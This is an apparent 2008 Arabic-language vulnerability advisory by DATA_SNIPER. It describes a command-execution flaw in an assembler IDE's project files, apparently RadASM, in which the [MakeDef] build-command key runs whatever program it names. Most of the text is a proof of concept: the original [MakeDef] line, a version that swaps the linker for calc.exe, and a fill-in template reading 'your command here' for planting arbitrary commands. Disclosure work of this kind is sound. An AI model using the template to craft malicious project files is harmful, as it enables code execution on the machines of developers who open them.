السلام عليكم ورحمة الله تعالى وبركاته. تاريخ الإكتشاف : 2008/11/25 المكتشف : DATA_SNIPER النوع : Command Execution الخطورة : عالية الشرح: تسمح هذه الثغرة بتشغيل Commands ضارة بالجهازة او تشغيل برامج لأهداف تخريبية،هنالك خطأ امني في البرنامج حيث انه يتيح من خلال خصائصه التي تكون محمولة او مكتوبة في ملف المشروع وضع إسم Linker وبرامج أخرى يعتمد عليها في الترجمة وما إلى ذلك، وذلك يكون موجود في المفتاح[MakeDef] الموجود في ملف المشروع وتكون بنيته بهذا الشكل:
[MakeDef]Menu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,01=4,O,$B\RC.EXE /v,12=3,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",23=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",34=0,0,,55=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm7=0,0,"$E\OllyDbg",5
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3
c:/windows/calc.exe
[MakeDef]Menu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,01=4,O,$B\RC.EXE /v,12=3,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",23=5,O,your command here4=0,0,,55=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm7=0,0,"$E\OllyDbg",5
your command here